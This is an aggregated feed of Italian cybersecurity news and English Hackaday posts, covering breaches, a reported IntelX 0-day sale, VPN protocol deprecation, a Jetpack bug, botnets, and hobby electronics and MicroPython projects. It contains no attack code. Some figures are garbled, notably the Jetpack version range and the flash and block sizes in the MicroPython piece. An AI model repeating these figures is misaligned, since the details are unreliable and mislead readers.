Tre attacchi, quasi simultanei, contro Internet Archive, la no-profit che si occupa di archiviare "la storia" di Internet. Con un timing che parte dalla fine di settembre fino al 9 ottobre, si sono registrati un breach di dati, un attacco DDoS e un defacement

L'articolo Data breach e attacco DDoS a Internet Archive: cosa fare per mettere al sicuro i propri dati proviene da Cyber Security 360.

L’affidamento di attività e processi aziendali a fornitori esterni è una strategia sempre più diffusa tra le imprese per accedere a competenze specialistiche e migliorare la propria efficienza operativa. Tuttavia, una dipendenza crescente da soggetti terzi può introdurre rischi significativi da gestire alla luce di obblighi e responsabilità introdotte dalla NIS 2

L'articolo NIS 2: la gestione del rischio di terze parti e il ruolo delle aziende come fornitori proviene da Cyber Security 360.

Al Cybertech Europe 2024 di Roma si è incontrata la cyber nazionale per fare il punto della situazione su una minaccia sempre più globale. Ma all’appello mancava l’ospite principale: un’assenza, quella delle PMI, che obbliga tutti a una profonda riflessione sui modi con cui si parla di cyber security

L'articolo La minaccia cyber è globale: serve una risposta collettiva, ma c’è il vuoto di PMI proviene da Cyber Security 360.

Le linee guida sul legittimo interesse, appena pubblicate dall’EDPB e ora in consultazione pubblica fino al 20 novembre, offrono una visione integrata e articolata che ne chiarisce i confini di applicabilità, definendo i criteri per un bilanciamento adeguato tra le necessità del titolare e la tutela degli individui. I punti cardine

L'articolo Legittimo interesse, l’EDPB chiarisce i confini di applicabilità e la centralità dell’accountability proviene da Cyber Security 360.

Ecco una guida pratica sulle modalità applicative della disciplina in materia di protezione dei dati personali negli enti del terzo settore, con un focus specifico sull’efficace implementazione di un sistema di gestione privacy nel contesto di Comitato locale di Croce Rossa Italiana

L'articolo Privacy in Croce Rossa: esempio per l’applicazione della data protection a un comitato locale proviene da Cyber Security 360.

I sistemi XDR (eXtended Detection and Response) sono soluzioni di sicurezza integrate per il controllo non solo degli endpoint, ma anche dei gateway di posta elettronica, dei servizi cloud e degli accessi. Ecco di cosa si tratta, come funzionano, quali sono i migliori approcci di configurazione e le soluzioni da adottare in azienda

L'articolo Sistemi XDR (eXtended Detection and Response): a cosa servono, come funzionano, i più efficaci proviene da Cyber Security 360.

Un nuovo malware, scritto in linguaggio Lua, sta prendendo di mira i gamer nascondendosi dentro falsi cheat e riuscendo a eludere i software antivirus e gli strumenti di sicurezza. Ecco i dettagli tecnici per riconoscerlo e le misure di sicurezza da adottare per difendersi

L'articolo Il malware Lua colpisce i gamer con falsi cheat per giochi: come proteggersi proviene da Cyber Security 360.

Recentemente un criminale informatico su un forum underground ha messo in vendita una vulnerabilità 0-day che coinvolge IntelX, un potente motore di ricerca utilizzato da investigatori, giornalisti e professionisti della sicurezza per recuperare informazioni da fonti pubbliche e private su internet.

L’utente con il nome “kittykitten”, offre la vulnerabilità in cambio di un pagamento, indicando Telegram come metodo di contatto per ulteriori dettagli e prove.

IntelX è noto per la sua capacità di accedere a informazioni difficilmente reperibili, come documenti eliminati o nascosti, archivi di dati, metadati e fonti web deep e dark.

È uno strumento particolarmente utile per investigazioni digitali, ma anche estremamente delicato, dato che la compromissione del sistema potrebbe esporre dati sensibili o favorire accessi non autorizzati a informazioni private.

Al momento, non possiamo confermare la veridicità della notizia, poiché l’organizzazione non ha ancora rilasciato alcun comunicato stampa ufficiale sul proprio sito web riguardo l’incidente. Pertanto, questo articolo deve essere considerato come ‘fonte di intelligence’.

Dettagli

L’offerta della vulnerabilità è stata pubblicata il 7 ottobre 2024, alle 02:40 AM, con il titolo “IntelX 0Day Vulnerability”. Il venditore afferma di essere in possesso di una vulnerabilità che coinvolge IntelX e invita potenziali acquirenti a contattarlo tramite Telegram per ulteriori dettagli. Non vengono condivise ulteriori informazioni specifiche sulla vulnerabilità direttamente nel post, il che è comune in questi casi per evitare che altri possano sfruttare la vulnerabilità senza acquistarla.

Nel post si leggono anche riferimenti a parole chiave come “intelx vulnerability 0day russia usa brazil brasil saudi arabia arab india”, suggerendo che il venditore potrebbe voler attirare l’attenzione di un pubblico internazionale, incluso quello di stati o gruppi cybercriminali in diverse parti del mondo. Questi attori potrebbero essere interessati a ottenere accesso a informazioni riservate per fini di spionaggio o altre attività cibernetiche.

Il venditore offre ulteriori prove della vulnerabilità via Telegram, un’app spesso utilizzata per comunicazioni private e sicure, rendendo difficile rintracciare l’identità o il luogo dell’offerente.

Conclusioni

L’offerta di una vulnerabilità 0-day relativa a IntelX in un forum underground evidenzia la fragilità anche delle piattaforme più sofisticate e importanti. Il fatto che l’offerta sia stata rivolta a un pubblico globale, con menzioni specifiche a Paesi come Russia, USA, Brasile e Arabia Saudita, lascia intendere che questo tipo di vulnerabilità potrebbe finire nelle mani di gruppi di spionaggio o altre organizzazioni malintenzionate.

La vendita di questa vulnerabilità su IntelX rappresenta solo uno dei tanti episodi che mostrano quanto sia importante non abbassare la guardia nel campo della sicurezza digitale.

Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.

RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.

L'articolo Vulnerabilità 0-Day su IntelX: Un’opportunità per hacker e governi? proviene da il blog della sicurezza informatica.

Microsoft ha ufficialmente annunciato la deprecazione dei protocolli PPTP (Point-to-Point Tunneling Protocol) e L2TP (Layer 2 Tunneling Protocol) dalle future versioni di Windows Server.

E’ evidente che l’azienda sta aumentando i suoi sforzi per rimuovere dal sistema operativo le tecnologie che considera obsolete.

Dopo il recente annuncio della deprecazione del servizio WSUS, (leggi l’articolo completo) la stessa identica sorte spetterebbe ai protoccoli ​​PPTP e L2TP, da tempo noti per essere non sicuri e soggetti a vulnerabilità.

Panoramica

Con la rapida evoluzione delle minacce informatiche, i protoccoli PPTP e L2TP non sono più considerati abbastanza robusti da soddisfare gli standard di sicurezza moderni per effettuare collegamenti VPN, venendo classificati finalmente da Microsoft come protocolli obsoleti.

PPTP è risaputo da molti anni che è enormemente insicuro essendo vulnerabile agli attacchi Brute Force. Utilizzare questo protocollo VPN oggi è tremendamente rischioso per un’azienda.

L2TP non fornisce alcuna crittografia a meno che non sia abbinato a un altro protocollo, come IPSec. Ad ogni modo, se L2TP/IPSec non fosse configurato correttamente, può introdurre debolezze che lo rendono suscettibile ad attacchi.

Per questi motivi, Microsoft, ora consiglia agli utenti di passare ai due restanti protocolli VPN, ovvero SSTP (Secure Socket Tunneling Protocol) e IKEv2 (Internet Key Exchange versione 2), che offrono entrambi prestazioni e sicurezza migliori.

Nonostante l’azienda abbia rilasciato l’annuncio recentemente, i protocolli saranno comunque inclusi in Windows Server 2025. È importante ricordare che la deprecazione non significa la rimozione immediata. “Le funzionalità deprecate continuano a funzionare e sono completamente supportate fino a quando non vengono ufficialmente rimosse”, ha dichiarato Microsoft.

Conclusione

Deprecare PPTP e L2TP è un passaggio necessario per mantenere i più elevati standard di sicurezza. Gli amministratori IT che ancora utilizzano questi protocolli, dovrebbero iniziare a lavorare su un piano di modernizzazione e transizione verso protocolli più sicuri al fine di migliorare la sicurezza e le prestazioni delle connessioni VPN.

L'articolo Addio ai Protocolli Obsoleti: Microsoft Depreca PPTP e L2TP proviene da il blog della sicurezza informatica.

Gli sviluppatori del plugin Jetpack per WordPress hanno rilasciato un aggiornamento di sicurezza per risolvere una vulnerabilità critica che consentiva agli utenti autorizzati di accedere ai moduli inviati da altri visitatori del sito.

Jetpack, di proprietà di Automattic, fornisce un set completo di strumenti per migliorare la sicurezza e le prestazioni del sito. Secondo il sito web del plugin, viene utilizzato su 27 milioni di siti WordPress.

La vulnerabilità è stata scoperta nella funzionalità dei moduli di contatto di Jetpack durante un controllo di sicurezza interno. Esiste dalla versione 3.9.9, rilasciata nel 2016. Il problema ha consentito agli utenti non autorizzati di visualizzare i dati inviati dai visitatori tramite i moduli sul sito.

Il portavoce di Jetpack Jeremy Herve ha osservato che gli sviluppatori hanno lavorato a stretto contatto con il team di sicurezza di WordPress.org per aggiornare automaticamente il plugin a una versione sicura su tutti i siti installati.

La vulnerabilità è stata risolta nella versione 101 di Jetpack, a partire dalla 13.9.1 e terminando con la 3.9.10. Un elenco completo delle versioni interessate è stato pubblicato sul sito Web dello sviluppatore.

Sebbene al momento non vi siano informazioni che la vulnerabilità sia stata sfruttata dagli aggressori, il rischio di uno sfruttamento diventa concreto dopo la divulgazione pubblica delle informazioni.

L'articolo Un bug vecchio di 8 anni è stato risolto nel plugin Jetpack per WordPress proviene da il blog della sicurezza informatica.

To capture an instant on film or sensor with a camera, you usually need a fast shutter. But alternately a flash can be triggered with the scene in the dark and the shutter wide open. It’s this latter technique which PetaPixel are looking at courtesy of the high-speed class at Rochester Institute of Technology. They’re using a cheap sound sensor module and an Arduino to catch instantaneous photographs, with students caught in the act of popping balloons.

The goal here was to keep things as simple as possible. All you’ll need in addition to the Arduino (or really, any modern microcontroller) is the sound sensor — which are often sold as “microphone shields.” To trigger the flash while still providing electrical isolation is a reed relay. The write-up notes that higher performance systems would be better off with an optoisolator, but this provides a low-cost alternative to get started with.

We rather like the technique, and perhaps it’s a thing to try at a future hacker camp. Unsurprisingly it’s not the first flash trigger for water balloons we’ve seen.

hackaday.com/2024/10/15/an-ard…

We have all seen the advertisements and glossy flyers for coding assistants like GitHub Copilot, which promised to use ‘AI’ to make you write code and complete programming tasks faster than ever, yet how much of that has worked out since Copilot’s introduction in 2021? According to a recent report by code analysis firm Uplevel there are no significant benefits, while GitHub Copilot also introduced 41% more bugs. Commentary from development teams suggests that while the coding assistant makes for faster writing of code, debugging or maintaining the code is often not realistic.

None of this should be a surprise, of course, as this mirrors what we already found when covering this topic back in 2021. With GitHub Copilot and kin being effectively Large Language Models (LLMs) that are trained on codebases, they are best considered to be massive autocomplete systems targeting code. Much like with autocomplete on e.g. a smartphone, the experience is often jarring and full of errors. Perhaps the most fair assessment of GitHub Copilot is that it can be helpful when writing repetitive, braindead code that requires very little understanding of the code to get right, while it’s bound to helpfully carry in a bundle of sticks and a dead rodent like an overly enthusiastic dog when all you wanted was for it to grab that spanner.

Until Copilot and kin develop actual intelligence, it would seem that software developer jobs are still perfectly safe from being taken over by our robotic overlords.

hackaday.com/2024/10/15/assess…

We’re suckers for good-looking old-school calculators, so this interesting numerical equation-solving calculator by [Peter Balch] caught our attention. Based around the ESP32-WROOM-32 module and an LCD, the build is quite straightforward from an electronics point of view, with the main work being on the software side of things.

A custom keyboard was constructed on Veroboard using a handful of tactile switches arranged in a charlieplexing array to minimize the number of IO pins consumed. For the display, an off-the-shelf 240×320 ILI9341-based module hooked up by SPI was used. A single lithium cell was used for the power supply, connected to a USB
You don’t need much to make a usable keyboard.
charger module, but you could just as easily substitute a 3 x AA battery box. The case was designed in DesignSpark mechanical and 3D printed. It’s unclear what keyboard version they settled on; there are options for one with keycaps and one without. Regardless, a 3D-printed frame sits atop the keyboard circuit, with the graphics printed on photo paper and a protective coversheet on top.

The most interesting part of this project is the software and [Peter]’s extensive explanation of the pros and cons of the various numerical-solving algorithms. “Solve,” as they call the project, uses five methods to solve single-variable equations and Newton-Raphson for simultaneous equations. The exact method depends on the types of functions used in the equations and whether they are continuous.

Additionally, the calculator software supports looping constructs, allowing the generation of results tables and multivariable graph plotting. All in all, it could be a helpful desktop addition for someone needing a dedicated solver. Check out the project GitHub page for more details of the construction and software and to start building your own.

The subject of calculators is very personal, especially for engineers and scientists. Here’s our word on maybe the last physical scientific calculator. Of course, we’ve covered so many DIY calculator builds that we’ve lost count. Here’s a great example. Finally, who needs electronics when you can do it mechanically? Batteries not included.

hackaday.com/2024/10/15/solve-…

I bot sono applicazioni software progettate per eseguire automaticamente attività su Internet. Queste attività sono generalmente semplici e possono essere completate a una velocità maggiore di quella che un essere umano può fare online. I bot possono eseguire un’ampia gamma di attività, dall’indicizzazione di pagine Web per i motori di ricerca all’invio di spam o all’hacking di siti Web.

Alcuni bot sono legittimi, come Googlebot, che esegue la scansione di Internet e crea un indice per il motore di ricerca di Google. Esistono però anche bot dannosi che cercano le vulnerabilità dei siti web e sferrano attacchi.

Cos’è una botnet

Un caso d’uso comune per i bot sono le botnet. Una botnet è una rete di dispositivi infetti controllati tramite un sistema centrale di comando e controllo. Una volta che il dispositivo è stato infettato, inizia a eseguire i comandi impartiti dal “bot master”, ovvero chi controlla la botnet.

Le botnet vengono spesso utilizzate per sferrare attacchi DDoS (distributed denial of service), in cui un gran numero di dispositivi infetti inviano contemporaneamente richieste a un server, sovraccaricandolo e bloccandolo. Inoltre, le botnet possono essere utilizzate per lo spamming, l’hacking degli account e altre attività dannose.

Tipi di bot

Esistono molti tipi di bot su Internet, sia utili che dannosi. Vediamo le tipologie più comuni:

• Bot spider: noti anche come web spider o crawler, questi bot eseguono la scansione delle pagine Web per indicizzarne il contenuto per i motori di ricerca. I robot di ricerca caricano HTML, CSS, JavaScript e altre risorse per analizzare il contenuto del sito.
• Bot scraper: i robot scraper raccolgono dati dai siti Web, archiviandoli per un uso successivo. Possono copiare l’intero contenuto della pagina, nonché singoli elementi, come i prezzi dei prodotti o le informazioni di contatto.
• Bot spam: i bot spam raccolgono indirizzi email per inviare spam. Tali bot possono trovare indirizzi e-mail su siti Web, social network e altre risorse.
• Bot dei social media: questi bot operano sui social network creando automaticamente post, apprezzando, commentando o seguendo altri utenti. I social bot vengono utilizzati per promuovere idee, manipolare l’opinione pubblica e creare account falsi.
• Download bot: i bot di download scaricano automaticamente programmi o applicazioni. Possono essere utilizzati per aumentare artificialmente le statistiche di download delle app negli app store.

Come rilevare i bot su un sito web

Per identificare i bot su un sito web, puoi utilizzare diversi indicatori nell’analisi web:

• Aumenti del traffico, soprattutto durante le ore non lavorative.
• Frequenza di rimbalzo alta o bassa (i bot possono visitare una pagina e andarsene).
• Sorgenti di traffico insolite (ad esempio, un grande volume di traffico diretto da nuovi indirizzi IP).
• Prestazioni del server ridotte.
• Attività insolita da indirizzi IP sconosciuti o regioni in cui non hai client.

Come fermare i bot

Per proteggersi dai bot è possibile utilizzare le seguenti misure di base:

• Configura un file robots.txt per controllare l’accesso dei bot al tuo sito (efficace solo contro bot legittimi).
• Aggiungi CAPTCHA ai moduli di registrazione, commento o download.
• Imposta avvisi utilizzando JavaScript per monitorare attività sospette.

Come i bot aggirano il rilevamento

La tecnologia dei bot si è evoluta nel tempo. I bot erano semplici script che inviavano richieste a un sito Web per recuperare dati o eseguire azioni. Questi script non accettavano cookie né eseguivano JavaScript, rendendoli facilmente rilevabili.

Nel corso del tempo, i bot sono diventati più sofisticati, accettando cookie ed eseguendo JavaScript, ma erano ancora relativamente facili da monitorare a causa della loro minore interazione con gli elementi dinamici delle pagine web rispetto agli esseri umani.

La fase successiva nello sviluppo dei bot è l’uso di browser headless, come PhantomJS, che sono in grado di elaborare completamente il contenuto del sito. Sebbene tali browser siano più difficili da rilevare, non sono comunque in grado di eseguire tutte le azioni eseguite dagli utenti reali.

Il tipo più avanzato di bot si basa sul browser Chrome ed è praticamente indistinguibile dagli utenti reali. Questi robot imitano persino l’attività umana, come fare clic sugli elementi di una pagina.

Metodi avanzati di protezione contro i bot

Con l’evoluzione dei bot, si sono evoluti anche i metodi per rilevarli e bloccarli. Esistono tre approcci principali per rilevare e mitigare l’attività dei bot dannosi:

• Approccio statico: analizza le richieste e le intestazioni associate ai bot e bloccale in base alle caratteristiche identificate.
• Approccio basato sulla verifica: verifica la capacità di ciascun visitatore di utilizzare cookie, JavaScript e CAPTCHA per determinare se si tratta di un bot.
• Approccio comportamentale: studiare il comportamento dei visitatori e confrontarlo con le norme per identificare le deviazioni caratteristiche dei bot.

Questi metodi possono essere utilizzati da soli o in combinazione per fornire una protezione bot più efficace. Inoltre, servizi specializzati di gestione dei bot possono monitorare e bloccare attività dannose.

L'articolo Alla scoperta dei Bot! Da Googlebot alle Botnet Dannose, Ecco Cosa Devi Sapere proviene da il blog della sicurezza informatica.

A lot of hams like to carry a VHF radio. Of course, nearly everyone wants to carry a phone. Now, thanks to the kv4p HT, you don’t have to carry both. The open-source device connects to your Android smartphone and turns it into a radio transceiver. You can build it yourself for about $35. Check out the video below.

The device uses an ESP32 and only transmits one watt, but it has lots of features like APRS and scanning.

The brain is an ESP-WROOM-32. There’s also a ham radio “module” that is easily imported. The rest is fit, finish, and software. The PCB is fairly simple and inexpensive. A 3D-printed case completes things.

There is a new version of the PCB that hasn’t been tested as of this post, but the older version (1.5) seems to work ok, too, if you don’t want to risk trying the 1.6 version and you don’t want to wait.

We always marvel at how many building blocks you can get now. Grab a computer and a radio, and use your phone for power and a user interface. This would have been an enormous project to complete not long ago and now it is an hour’s time and $35. You’ll probably spend as much time ordering parts as building.

If your phone mostly trades cat memes, it fits right in with old ham tech. Just watch the antenna.

youtube.com/embed/9eXHgktFD-U?…

hackaday.com/2024/10/15/a-phon…

We really like PCB-level hacks, especially ones that show ingenuity in solving a real problem while being super cheap to implement. Hackaday.IO user [Steph] wanted a cheap way to switch a wearable on and off without having to keep popping out the battery, so they came up with a tweaked battery footprint, which is also a simple slide switch.

Most people making badges and wearables will follow the same well-trodden path of just yanking out the cell or placing some cheap switch down and swallowing the additional cost. For [Steph], the solution was obvious. By taking a standard surface-mount CR2032 button cell holder footprint, extending its courtyard vertically, and moving the negative pad up a smidge, the battery can be simply slid up to engage the pad and slid down to disengage and shut off the juice. The spring section of the positive terminal keeps enough pressure on the battery to prevent it from sliding out, but if you are worried, you can always add a dummy pad at the bottom, as well as a little solder bump to add a bit more security.

Now, why didn’t we think of this before? The KiCad footprint file can be downloaded from the project GitHub page, imported into your project and used straight away.

Many of our gadgets are powered by CR2032 cells—so many so that eliminating the need for them leads to interesting projects, like this sweet USB-powered CR2032 eliminator. But how far can you push the humble cell? Well, we held a contest a few years ago to find out!

hackaday.com/2024/10/15/your-b…

I recently got one of the new RP2040-based Bus Pirate 5 (BP5), a multi-purpose interface debugging and testing tool. Scanning the various such tools in my toolbox already: an Analog Discovery 2, a new Glasgow Interface Explorer, and a couple of pyboards, I realized they all had a Python or Micropython user interface. A few people on the BP5 forums had tossed around the idea of MicroPython, and it just so happened that I was experimenting with building beta versions of MicroPython for a RP2350 board at the time. Naturally, I started wondering, “just how hard can it be to get MicroPython running on the BP5?”

The Lazy Approach

Rather than duplicating the BP5 firmware functionality, I decided to ignore it completely and go with existing MicroPython capabilities. I planned to just make a simple set of board definition files — perhaps Board Support Package (BSP) is a better term? I’ve done this a dozen times before for development and custom boards. Then write a collection of MicroPython modules to conform to the unique aspects in the BP5 hardware. As user [torwag] over on the BusPirate forums said back in March:

Micropython comes already with some modules and enough functions to get some stuff out-of-the-box working. E.g. the infamous version of “hello world” for microcontrollers aka led-blinking.

The Tailoring

The main interfaces to the BP5’s RP2040 MCU were apparently done with the Pico reference design in mind. That is why you can just load and run the latest RP2 MicroPython build without defining a custom board ( note that this only worked with the current v1.24, and failed when I tried to load v1.23 using Thonny, something I did not investigate further ). But there are some things that can be done to tweak the build, so I did go ahead and make set of custom board definition files for the BP5.

First I tried to tell MicroPython about the larger QSPI flash. This is a standard thing in configuring MicroPython, but I found an issue with the RP2. The Pico C SDK has a 2 GiB hard-coded flash limit in a linker script. One can fix this by hand editing and rebuilding the SDK, something I decided to leave for later. So I did all my testing using just 2 GiB of the flash.

Several of the constomizations that I would normally make, like the serial interface pins assignments, were not necessary. The customization I did make was for help files. Since the intended application of this project is a manual debugging, I wanted the modules and funtions to have help text. By default, MicroPython builds on the RP2 do not enable __doc__ strings, but they can be reenabled with a compiler directive. Unfortunately, while the __doc__ strings are now retained, the build-in help() function doesn’t print them like CPython. The workaround is to add a help() funtion to each class. So instead of help(adc) you’t type add.help().

Finally, I wanted to add a board top-level help screen, appending to the existing RP2 port help screen. That turned out to be much harder to do, and in the end, I just gave up doing that in the BP5 board definition folder. Instead, I kludged a couple of files in the RP2 port directory — ugly, but this is just an experiment after all.

The Interfaces

These are the basic interfaces of the BP5 hardware, and all of them are arleady or easily supported in MicroPython.

• Eight Buffered IO pins
• Programmable Power Supply
• NAND flash 1Gbit
• IPS LCD screen, 320 x 240 pixels
• 18 RGB LEDs
• Push button

Going for some instant gratification, I decided to drive the chain of LEDs around the perimeter of the unit first. The RP2 port of MicroPython already has a Neopixel class. Once I sorted out the chained shift register I/O expansion circuitry, I was running MicroPython and blinking LEDs in no time. The eight main buffered I/O signals posed a bit more challenge, because there are bidirectional logic level translators on each pin. After writing a BP5 I/O pin wrapper class around the regular MP Pin class to handle that aspect of the hardware, I realized that wasn’t quite enough.

But the digital I/O signals on the BP5 aren’t useful until you also control the adjustable voltage reference rail. That led to the Power supply class next, which in turn led to the Analog to Digital class to handle ADC operations. To do this, you need to control the analog MUX. And you need to drive the 74HC595 output expander shift register to select the desired analog MUX channel. No more instant gratification.

The shift register was pretty easy, as I have done this before. The only thing I noted was that there is no feedback, so you can’t read the current state. This requires instead that you keep a shadow register of the current output expander state.

[Ian], the father of the BP5 and indeed all Bus Pirates to date, did a great job in the documentation of explaining all these hardware sections of the design. The resulting power supply circuit is quite flexible. In brief, voltage and current control are done using PWM outputs, and actual voltage and current are sensed using the RP2040’s internal ADCs via the MUX. In addition, a programmable current limit threshold triggers a power supply shutdown, which can be overridden or reset as desired.

The Display

The BP5 uses a two inch IPS TFT LCD having 240×320 pixel resolution. It is controlled using a Sitronix ST7789 over SPI. Having driven similar setups before from MicroPython, this was pretty easy. At first. I used the ST7789 library by Russ Hughes. The display was up and displaying text and running a few demo examples in short order.

The NAND Flash

Turning attention to the Micron MT29F1G01A 1 Gib ( 128 MiB ) NAND flash next, I ran into some difficulty. [Peter Hinch]’s memory chip driver library seemed like a good start. But this chip isn’t on the list of already tested chips. I changed the scan function to recognized the Micron ID manufacturer’s byte codes, but after configuring the correct chip size, sector size, and block size parameters, it still didn’t work. After finally asking for help, [Mr Hinch] explained that my problem was the large 138 KiB block size of this chip. His library buffers one entire block, and 138 KiB is just too big for most microprocessors.

He pointed me to a non-buffered SPI block device driver by [Robert Hammelrath]. I tried this briefly, but gave up after a few hours because I was spending too much time on this chip. This is a solvable problem, but not strictly needed for this goals of this experimental project.

The Images

Speaking of wasting time, I spent way too much time on this part of the project. Not because it was necessary, but just because it was just cool. My idea was a pong-like demo where an icon moves around the screen, rebounding off the screen edges. These LCD screen driver chips use a packed pixel format, RGB565. I found a tool on GitHub called rgb565-converter which converts PNG images to and from RGB565 format in C++ format. I forked and heavily modified this to generate Python code as well, in addition to 4-bit grayscale format as well. The animated GIF shows this in action.

The Wrapup

I emjoyed making this project, and learned a few more things about MicroPython along the way. I knew that the STM32 and the ESP8266 / ESP32 families had been long supported by MicroPython almost since the beginning, and that the Pico RP2040 was a relative newcomer to the ecosystem. But I was surprised when I stumbled on this talk by founder [Damien George] about the history of the project at the 2023 PyCon Australia conference. He shows some statistics collected over 8 years of downloads broken down by microprocessor family. The RP2040 has been extremely popular since its introduction, quickly surpassing all other families.

MicroPython Monthly Downloads by MCU Family, provided by [Damien George]This project presented a few frustrating issues, none of which would be showstoppers if this approach were to be developed further. I continue to be impressed by the number of people in the MicroPython community who have developed a wide variety of support libraries and continue to work on the project to this day.

Which begs the question, does the idea of MicroPython on the BusPirate even make sense? The existing C-based BusPirate firmware is now well established and works well for its intended purpose — quick explorations of an interface from the command line. Would a alternate MicroPython build benefit the community or just waste people’s limited development hours?

There could be some way to create an MicroPython implementation without duplicating a lot of code. The existing BP5 firmware could be treated as a library, and compiled with various C to MicroPython shim functions to create an extensively customized build. That is beyond my MicroPython experience for now, but it might be worth consideration.

Another way would be just build a set of “big Python” classes to represent the BP5 on the desktop. This module would talk to the BP5 using the existing serial / USB port protocol, potentially requiring no firmware modifications at all. This seems like a good idea in general, since it allows users to easily script operations from the desktop using Python, and still retain the original capabilities of the BP5 in standalone operation.

The code for this project and associated documentation can be found here on GitHub. You can build your own binary if you want, but one is provided in the repo. And as [torwag] said back in March, you can just run the factory RP2040 MicroPython as well. In my testing, the only thing you’ll miss are the help messages.

If you want to learn more about MicroPython, visit their website and GitHub repository. Prebuilt binaries are available for many standard development boards, and instructions on building it for a custom boards are quite clear and easy to follow. I’ve heard rumors that docker containers may be available soon, to make the building process even easier. Visit the Bus Pirate website and corresponding GitHub repository to learn more about the latest Bus Pirate 5 project. We have covered both projects over the years on Hackaday. Most recently [Tom Nardi] did an extensive hands-on writeup on the release of the Bus Pirate 5 back in February. Also [Arya Voronova] has written several articles on MicroPython, including this one on the eleventh anniversary of the MicroPython project. Do you use MicroPython in your projects, and what’s your take on the idea of using it with the Bus Pirate 5 board?

hackaday.com/2024/10/15/experi…

Example of a graph representation of one identified network with connections coded by neurotransmitter types. (Credit: Amy Sterling, Murthy and Seung Labs, Princeton University)
Compared to the human brain, a fruit fly (Drosophila melanogaster) brain is positively miniscule, not only in sheer volume, but also with a mere 140,000 or so neurons and 50 million synapses. Despite this relative simplicity, figuring out how the brain of such a tiny fly works is still an ongoing process. Recently a big leap forward was made thanks to crowdsourced research, resulting in the FlyWire connectome map. Starting with high-resolution electron microscope data, the connections between the individual neurons (the connectome) was painstakingly pieced together, also using computer algorithms, but with validation by a large group of human volunteers using a game-like platform called EyeWire to perform said validation.

This work also includes identifying cell types, with over 8,000 different cell types identified. Within the full connectome subcircuits were identified, as part of an effort to create an ‘effectome’, i.e. a functional model of the physical circuits. With the finished adult female fruit fly connectome in hand, groups of researchers can now use it to make predictions and put these circuits alongside experimental contexts to connect activity in specific parts of the connectome to specific behavior of these flies.

Perhaps most interesting is how creating a game-like environment made the tedious work of reverse-engineering the brain wiring into something that the average person could help with, drastically cutting back the time required to create this connectome. Perhaps that crowdsourced research can also help with the ongoing process to map the human brain, even if that ups the scale of the dataset by many factors. Until we learn more, at this point even comprehending a fruit fly’s brain may conceivably give us many hints which could speed up understanding the human brain.

Featured image: “Drosophila Melanogaster Proboscis” by [Sanjay Acharya]

hackaday.com/2024/10/15/mappin…

In vista delle elezioni presidenziali americane, la campagna di Donald Trump ha rafforzato le sue misure di sicurezza informatica, dotando il suo team delle più recenti tecnologie di protezione dagli hacker. Il principale fornitore di attrezzature era Green Hills Software, noto per i suoi prodotti militari. Dopo un recente incidente in cui hacker iraniani hanno rubato email e dati dal suo quartier generale, Trump ha deciso di fare tutto il possibile per evitare che ciò accada di nuovo.

Green Hills ha fornito alla squadra di Trump telefoni e computer “inattaccabili” basati sul sistema operativo Integrity-178B, utilizzato su aerei militari come il bombardiere stealth B-2 e gli aerei da combattimento F-22 e F-35. Questo sistema operativo è uno dei pochi certificati Evaluation Assurance Level 6, il che lo rende praticamente invulnerabile agli attacchi informatici. L’azienda afferma di aver minimizzato tutte le possibili vulnerabilità riducendo il codice di sistema a 10mila righe.

Dan O’Dowd, CEO di Green Hills Software, ha affermato che i dipendenti dell’azienda conducono costantemente test approfonditi del sistema operativo e spesso non riescono a identificare un singolo bug o punto debole. L’azienda ha già offerto i propri servizi alla squadra di Kamala Harris, un’altra contendente alla presidenza degli Stati Uniti.

Le apparecchiature Green Hills promettono anche protezione contro i moderni programmi cyberspyware, come il famoso Pegasus del gruppo NSO. Tuttavia, tali affermazioni suscitano interesse non solo tra i clienti, ma anche tra gli hacker, per i quali ciò diventa una sorta di sfida. Nonostante le grandi promesse, gli esperti sono scettici sul fatto che qualsiasi programma possa essere completamente protetto dagli attacchi.

In previsione delle elezioni, Green Hills prevede di offrire la propria tecnologia per proteggere i sistemi elettorali. O’Dowd sottolinea l’importanza di una forte sicurezza elettorale, paragonandola alla sicurezza dei sistemi nucleari, e ritiene che la sicurezza elettorale dovrebbe essere allo stesso livello.

Tuttavia, nonostante tutti gli sforzi, la sicurezza dei sistemi elettorali rimane ancora in discussione e presto diventerà chiaro se l’hardware e il software di Green Hills saranno all’altezza delle aspettative riposte su di esso.

L'articolo Telefoni e Computer Inattaccabili per Donald Trump! Gli hacker accettano la sfida! proviene da il blog della sicurezza informatica.

Bologna, Italia – 15 ottobre 2024 – Grazie al cloud object storage DS3 di Cubbit, il primo enabler di cloud storage geo-distribuito, Eurosystem SpA, System Integrator italiano con oltre 40 anni di esperienza nel settore IT, ha registrato un aumento del 580% dei ricavi dai servizi storage. Eurosystem SpA punta a gestire un petabyte di dati dei propri clienti attraverso il cloud di Cubbit entro la fine del 2025 e, grazie alla collaborazione con la scale-up bolognese, oggi è in grado di generare nuovi flussi di ricavi, conquistare mercati verticali strategici e fidelizzare i propri clienti offrendo un S3 cloud storage con un livello di sovranità e resilienza dei dati senza pari e che permette, inoltre, l’ottimizzazione dei costi e la scelta della localizzazione geografica dei dati archiviati.

Forte di oltre 40 anni di esperienza nelle soluzioni tecnologiche e nella sicurezza informatica, Eurosystem SpA supporta più di 800 clienti B2B in Italia, in particolare nell’area settentrionale, con implementazioni personalizzate, formazione e supporto continuo. L’azienda si rivolge a mercati e settori verticali che richiedono sicurezza avanzata e archiviazione dei dati a costi contenuti, tra cui l’industria manifatturiera, lo sport, le telecomunicazioni e i media.

Le minacce informatiche, come gli attacchi ransomware, oggi sono sempre più sofisticate e mirano alle vulnerabilità, sia lato client sia lato server, con una precisione senza precedenti. Eurosystem SpA era alla ricerca di una soluzione di storage definitiva per proteggere i dati dei propri clienti e che fosse compatibile con Veeam, requisito fondamentale poiché la maggior parte dei clienti di Eurosystem si affida a questo client di backup.

